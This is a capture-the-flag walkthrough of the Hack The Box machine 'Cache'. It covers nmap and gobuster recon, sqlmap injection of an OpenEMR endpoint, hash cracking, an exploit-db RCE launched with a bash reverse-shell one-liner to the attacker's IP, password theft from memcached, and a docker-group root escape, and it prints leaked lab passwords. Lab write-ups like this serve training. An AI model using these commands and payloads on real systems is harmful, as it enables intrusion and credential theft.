HTB Cache Walkthrough
Cache is a medium Linux box that needs a lot of enumeration and it requires chaining multiple exploits together and cracking a hash to get a shell on the server, and then pentesting an internal Memcached server to own the second user, and finally, we exploit a docker container to get root privileges on the server.
Reconnaissance
We start with Nmap scan to check open ports and the services that are running on the server
nmap -sT -sC -sV 10.10.10.188- -sT to run TCP scan
- -sC to use Nmap default script scan
- -sV to enumerate service version
We see that we have:
- Port 22 ssh is open and it runs OpenSSH 7.6p1
- Port 80 HTTP is open and it runs apache/2.4.29
I ran gobuster to enumerate hidden directories
gobuster dir -u http://10.10.10.188/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtMeanwhile gobuster brute-forcing the directories, I started with the manual HTTP enumeration so I opened http://10.10.10.188/ and I got a web page
I pressed on Login and I got redirected to a login page
I tried default credentials like user:password, admin:admin, admin:password but nothing worked.
I tried to SQL inject the page but it didn’t work.
I checked the results from gobuster
I opened the /jquery directory and I got a JavaScript file named functionality.js
I opened it and I got JavaScript functions for authentication, and we got login credentials for the user ash with the password H@v3_fun
I went back to the login page and I tried those credentials and I managed to login, and I got redirected to /net.html
I checked the source of the page but I could not find anything useful, so I went deep in the rabbit hole for a while trying to investigate the image with stego tools but got nothing, so I took a short pause, and I came back and surfed the web site again, and something caught my attention when I read what’s written in /author.html
“Check out his other projects like Cache:
HMS(Hospital Management System)”
Mmmm, could that be a domain name????
I opened /etc/hosts and I added hms.htb to it
I opened hms.htb in the browser, and I got openEMR script, which is “a medical practice management software which also supports Electronic Medical Records (EMR)”
Again I tried default creds like admin:admin, admin:password
but couldn’t log in.
I ran gobuster on it and I got
It took me a while to enumerate these directories manually, and I found Patient Portal Login in /portal but now, how can I proceed further without credentials….
I used searchsploit to look for public vulnerabilities for the openEMR, and I got tons of results
We do not know the version of the software so it’s hard to determine what to use, but it is written that “Copyright © 2018 OpenEmr” so I think that this version has been released in 2018. I googled “openEMR release history” and I got
It’s a high probability that the script version is 5.0.1
I used searchsploit to look for vulnerabilities for this specific version, and I got an RCE but it requires authentication
We need credentials for that.
I started googling openEMR vulnerabilities, and move from link to another, and I came across this PDF document OpenEMR v5.0.1.3 — Vulnerability Report
I went through the report, and I find
We can access the /add_edit_event_user.php without authentication, and it is vulnerable to SQL-injection in the parameter eid, so I intercepted the request with burp
and copied it’s content to a file and named it request.req
Exploitation:
I ran Sqlmap on this file that contains the request header
sqlmap -r request.req --dbsI got two databases
and I attacked the openemr database
sqlmap -r request.req -D openemr — tablesI got all the tables in openemr and the interesting table was users_secure
I dumped the data of it using this command
sqlmap -r request.req -D openemr -T users_secure -- dump
Username: openemr_admin
Password: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
Second way to inject the database:
There is an auxiliary in Metasploit to exploit the database
sqli/openemr/openemr_sqli_dumpI ran it in the background just out of curiosity, and it took four hours to dump all the tables of the database.
Cracking the hash:
I created a file using nano and named it hash, then I copied the hash into this file, and I used john with the rockyou wordlist to crack the hash
john -w=/usr/share/wordlists/rockyou.txt hashWithin a few seconds, the hash was cracked, and it was xxxxxx
Now we have username and password openemr_admin:xxxxxx
We can try the RCE vulnerability with these credentials.
I tried the exploit using Metasploit but it didn’t work.
So I mirrored the exploit from exploit-db to my machine using the command
searchsploit -m exploits/php/webapps/45161.pyand I renamed it using the mv command
mv 45161.py cache.pyI listened on the port 4444 using Netcat and I ran the exploit
python cache.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.64/4444 0>&1'and I got a shell on the server as www-data
I upgraded the shell using the following commands and went to priv-esc
python3 -c 'import pty;pty.spawn("/bin/bash");'
ctl+z
stty raw -echo
fg
export TERM=xterm-256colorPrivilege Escalation:
The users on the server are ash and luffy
We got ash credentials from the first enumeration phase(from the javascript file “functionality.js”) his password was H@v3_fun I tried
su ashand I entered the password H@v3_fun, and we owned the user ash
Escalating from ash to luffy:
I started with basic enumeration commands, and something caught my attention while I was checking the network connections on the server.
The port 11211 was open(internally), and this was abnormal to me
With a quick google search, I knew that the service that is running on this port is a Memcached Server which is “a general-purpose distributed memory caching system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API)”
I found this article about pentesting memcached server
I connected to the server using telnet
telnet 127.0.0.1 11211
I dumped all the keys in the slab with the ID 1 using the command
stats cachedump 1 0I got
I used get command to fetch the values stored in the keys, and I got luffy’s password which was 0n3_p1ec3
I tried to
su luffyand entered his password 0n3_p1ec3 and I owned luffy
As soon as I typed the id command I noticed that the user luffy is a part of the docker group, I searched for docker in Gftobins
and I got this
Note: you have to change “alpine” to the docker image name on the target, and on this machine, it was “ubuntu”
So I ran the following command and I gained root priviliges.
docker run -v /:/mnt — rm -it ubuntu chroot /mnt sh
